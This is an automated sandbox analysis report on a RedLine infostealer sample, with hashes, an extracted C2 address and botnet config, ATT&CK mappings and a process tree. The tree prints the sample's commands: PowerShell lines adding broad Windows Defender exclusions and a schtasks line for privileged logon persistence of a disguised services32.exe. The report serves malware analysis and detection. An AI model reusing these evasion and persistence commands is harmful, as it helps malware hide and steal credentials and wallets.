redline | 5d4cd0ca70d224e17ba7f0c1a0a64cd68505d8ac10ffc23d96fba3ae166c60c8

Analysis

max time kernel
127s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-05-2022 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file1.exe
Size

1.8MB
MD5

ff791e2212ce12a8e334ce553857eb89
SHA1

1d76dc8f24fe839b8938a6c84fa55dfabaa10e39
SHA256

5d4cd0ca70d224e17ba7f0c1a0a64cd68505d8ac10ffc23d96fba3ae166c60c8
SHA512

559407e2d66ae8f5741fb38527b2f5ee98deaf13054226ca43f6bf00bb40380c8c8d5fc6a64d5640b7d72dc52a727ca3e6f5f71422147e63b1214a5193e15295

Score

10^/10

redline @ansdvsvsvd infostealer spyware vmprotect

Malware Config

Extracted

Family

redline

Botnet

@ansdvsvsvd

46.8.220.88:65531

Attributes

auth_value
d7b874c6650abbcb219b4f56f4676fee

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1492-133-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

fl.exeservices32.exesihost32.exe

pid process

3996 fl.exe
3696 services32.exe
3336 sihost32.exe

pid	process
3996	fl.exe
3696	services32.exe
3336	sihost32.exe

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\fl.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\fl.exe	vmprotect
behavioral2/memory/3996-152-0x00000000007E0000-0x0000000000FFA000-memory.dmp	vmprotect
C:\Windows\System32\services32.exe	vmprotect
C:\Windows\system32\services32.exe	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

services32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	services32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 3 IoCs

Processes:

services32.exefl.exe

description	ioc	process
File created	C:\Windows\system32\Microsoft\Telemetry\sihost32.exe	services32.exe
File created	C:\Windows\system32\services32.exe	fl.exe
File opened for modification	C:\Windows\system32\services32.exe	fl.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

file1.exe

description pid process target process

PID 3656 set thread context of 1492 3656 file1.exe AppLaunch.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1252 schtasks.exe

description	pid	process	target process
PID 3656 set thread context of 1492	3656	file1.exe	AppLaunch.exe

pid	process
1252	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

AppLaunch.exefl.exepowershell.exepowershell.exepowershell.exeservices32.exepowershell.exe

pid	process
1492	AppLaunch.exe
3996	fl.exe
1620	powershell.exe
1620	powershell.exe
1916	powershell.exe
1916	powershell.exe
1856	powershell.exe
3696	services32.exe
3696	services32.exe
1856	powershell.exe
2056	powershell.exe
2056	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

AppLaunch.exefl.exepowershell.exepowershell.exepowershell.exeservices32.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1492	AppLaunch.exe
Token: SeDebugPrivilege	3996	fl.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	3696	services32.exe
Token: SeDebugPrivilege	2056	powershell.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

file1.exeAppLaunch.exefl.execmd.execmd.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 3656 wrote to memory of 1492	3656	file1.exe	AppLaunch.exe
PID 3656 wrote to memory of 1492	3656	file1.exe	AppLaunch.exe
PID 3656 wrote to memory of 1492	3656	file1.exe	AppLaunch.exe
PID 3656 wrote to memory of 1492	3656	file1.exe	AppLaunch.exe
PID 3656 wrote to memory of 1492	3656	file1.exe	AppLaunch.exe
PID 1492 wrote to memory of 3996	1492	AppLaunch.exe	fl.exe
PID 1492 wrote to memory of 3996	1492	AppLaunch.exe	fl.exe
PID 3996 wrote to memory of 716	3996	fl.exe	cmd.exe
PID 3996 wrote to memory of 716	3996	fl.exe	cmd.exe
PID 716 wrote to memory of 1620	716	cmd.exe	powershell.exe
PID 716 wrote to memory of 1620	716	cmd.exe	powershell.exe
PID 3996 wrote to memory of 2500	3996	fl.exe	cmd.exe
PID 3996 wrote to memory of 2500	3996	fl.exe	cmd.exe
PID 2500 wrote to memory of 1252	2500	cmd.exe	schtasks.exe
PID 2500 wrote to memory of 1252	2500	cmd.exe	schtasks.exe
PID 716 wrote to memory of 1916	716	cmd.exe	powershell.exe
PID 716 wrote to memory of 1916	716	cmd.exe	powershell.exe
PID 3996 wrote to memory of 1492	3996	fl.exe	cmd.exe
PID 3996 wrote to memory of 1492	3996	fl.exe	cmd.exe
PID 1492 wrote to memory of 3696	1492	cmd.exe	services32.exe
PID 1492 wrote to memory of 3696	1492	cmd.exe	services32.exe
PID 3696 wrote to memory of 2396	3696	services32.exe	cmd.exe
PID 3696 wrote to memory of 2396	3696	services32.exe	cmd.exe
PID 2396 wrote to memory of 1856	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 1856	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 2056	2396	cmd.exe	powershell.exe
PID 2396 wrote to memory of 2056	2396	cmd.exe	powershell.exe
PID 3696 wrote to memory of 3336	3696	services32.exe	sihost32.exe
PID 3696 wrote to memory of 3336	3696	services32.exe	sihost32.exe

C:\Users\Admin\AppData\Local\Temp\file1.exe
"C:\Users\Admin\AppData\Local\Temp\file1.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1492

C:\Users\Admin\AppData\Local\Temp\fl.exe
"C:\Users\Admin\AppData\Local\Temp\fl.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
5⤵
- Creates scheduled task(s)
PID:1252

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\services32.exe
C:\Windows\system32\services32.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
6⤵
- Suspicious use of WriteProcessMemory
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
6⤵
- Executes dropped EXE
PID:3336

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cc19bcff372d20459d3651ba8aef50e7

SHA1
3c6f1d4cdd647864fb97a16b1aefba67fcee11f7

SHA256
366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9

SHA512
a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Temp\fl.exe
Filesize
4.1MB

MD5
5d992ab82f9c757282ddbb72eb879737

SHA1
10ffd1147bd4e1840f5b128f73d02236f7c1ef4f

SHA256
949a52ca324fa509dc8e28b3d909338421e1b235d1a40359eafa362649fcbad4

SHA512
9f4605bf1e34afa3b4389138bd9acc7eb302dd38e38b8f7d802ec6688d9f02c1ba230f9e56f5ccbd129200f41b6a5421fabbd35b846b4c823945b39d48317fa1

Download Submit
C:\Users\Admin\AppData\Local\Temp\fl.exe
Filesize
4.1MB

MD5
5d992ab82f9c757282ddbb72eb879737

SHA1
10ffd1147bd4e1840f5b128f73d02236f7c1ef4f

SHA256
949a52ca324fa509dc8e28b3d909338421e1b235d1a40359eafa362649fcbad4

SHA512
9f4605bf1e34afa3b4389138bd9acc7eb302dd38e38b8f7d802ec6688d9f02c1ba230f9e56f5ccbd129200f41b6a5421fabbd35b846b4c823945b39d48317fa1

Download Submit
C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
Filesize
8KB

MD5
a1aacb74a859eea582d31bbbb862a6e9

SHA1
2056eebbaf11cd531c7e213bf2ba6e06b2babbf9

SHA256
7038e659711d46618c480eb5e18d11c574ba459ca728ed5f8cdb6ad9dab8563c

SHA512
5489f3cda3bd7f000aa022bd9acaba67277d088b3d84296f708119dfbb56d390f9b36cafa1bdf8b46ac7d5491c72278e368cb02107a505fd4cf52eecc05d4737

Download Submit
C:\Windows\System32\services32.exe
Filesize
4.1MB

MD5
5d992ab82f9c757282ddbb72eb879737

SHA1
10ffd1147bd4e1840f5b128f73d02236f7c1ef4f

SHA256
949a52ca324fa509dc8e28b3d909338421e1b235d1a40359eafa362649fcbad4

SHA512
9f4605bf1e34afa3b4389138bd9acc7eb302dd38e38b8f7d802ec6688d9f02c1ba230f9e56f5ccbd129200f41b6a5421fabbd35b846b4c823945b39d48317fa1

Download Submit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
Filesize
8KB

MD5
a1aacb74a859eea582d31bbbb862a6e9

SHA1
2056eebbaf11cd531c7e213bf2ba6e06b2babbf9

SHA256
7038e659711d46618c480eb5e18d11c574ba459ca728ed5f8cdb6ad9dab8563c

SHA512
5489f3cda3bd7f000aa022bd9acaba67277d088b3d84296f708119dfbb56d390f9b36cafa1bdf8b46ac7d5491c72278e368cb02107a505fd4cf52eecc05d4737

Download Submit
C:\Windows\system32\services32.exe
Filesize
4.1MB

MD5
5d992ab82f9c757282ddbb72eb879737

SHA1
10ffd1147bd4e1840f5b128f73d02236f7c1ef4f

SHA256
949a52ca324fa509dc8e28b3d909338421e1b235d1a40359eafa362649fcbad4

SHA512
9f4605bf1e34afa3b4389138bd9acc7eb302dd38e38b8f7d802ec6688d9f02c1ba230f9e56f5ccbd129200f41b6a5421fabbd35b846b4c823945b39d48317fa1

Download Submit
memory/716-157-0x0000000000000000-mapping.dmp

Download
memory/1252-162-0x0000000000000000-mapping.dmp

Download
memory/1492-140-0x0000000005210000-0x000000000531A000-memory.dmp

Filesize
1.0MB

Download
memory/1492-142-0x0000000005470000-0x00000000054E6000-memory.dmp

Filesize
472KB

Download
memory/1492-148-0x0000000007330000-0x000000000785C000-memory.dmp

Filesize
5.2MB

Download
memory/1492-146-0x00000000060B0000-0x0000000006116000-memory.dmp

Filesize
408KB

Download
memory/1492-145-0x00000000055C0000-0x00000000055DE000-memory.dmp

Filesize
120KB

Download
memory/1492-144-0x00000000062B0000-0x0000000006854000-memory.dmp

Filesize
5.6MB

Download
memory/1492-143-0x0000000005C60000-0x0000000005CF2000-memory.dmp

Filesize
584KB

Download
memory/1492-147-0x0000000006C30000-0x0000000006DF2000-memory.dmp

Filesize
1.8MB

Download
memory/1492-141-0x0000000005140000-0x000000000517C000-memory.dmp

Filesize
240KB

Download
memory/1492-139-0x00000000050E0000-0x00000000050F2000-memory.dmp

Filesize
72KB

Download
memory/1492-138-0x0000000005640000-0x0000000005C58000-memory.dmp

Filesize
6.1MB

Download
memory/1492-167-0x0000000000000000-mapping.dmp

Download
memory/1492-133-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1492-132-0x0000000000000000-mapping.dmp

Download
memory/1620-160-0x00000177F7310000-0x00000177F7332000-memory.dmp

Filesize
136KB

Download
memory/1620-159-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/1620-158-0x0000000000000000-mapping.dmp

Download
memory/1856-176-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/1856-175-0x0000000000000000-mapping.dmp

Download
memory/1916-166-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/1916-163-0x0000000000000000-mapping.dmp

Download
memory/2056-178-0x0000000000000000-mapping.dmp

Download
memory/2056-179-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/2396-174-0x0000000000000000-mapping.dmp

Download
memory/2500-161-0x0000000000000000-mapping.dmp

Download
memory/3336-181-0x0000000000000000-mapping.dmp

Download
memory/3336-185-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/3336-184-0x0000000000A00000-0x0000000000A06000-memory.dmp

Filesize
24KB

Download
memory/3656-131-0x0000000000B80000-0x0000000000D4C000-memory.dmp

Filesize
1.8MB

Download
memory/3656-130-0x0000000000B80000-0x0000000000D4C000-memory.dmp

Filesize
1.8MB

Download
memory/3696-168-0x0000000000000000-mapping.dmp

Download
memory/3696-171-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/3996-152-0x00000000007E0000-0x0000000000FFA000-memory.dmp

Filesize
8.1MB

Download
memory/3996-149-0x0000000000000000-mapping.dmp

Download
memory/3996-155-0x00007FF9F7830000-0x00007FF9F82F1000-memory.dmp

Filesize
10.8MB

Download
memory/3996-156-0x0000000001920000-0x0000000001932000-memory.dmp

Filesize
72KB

Download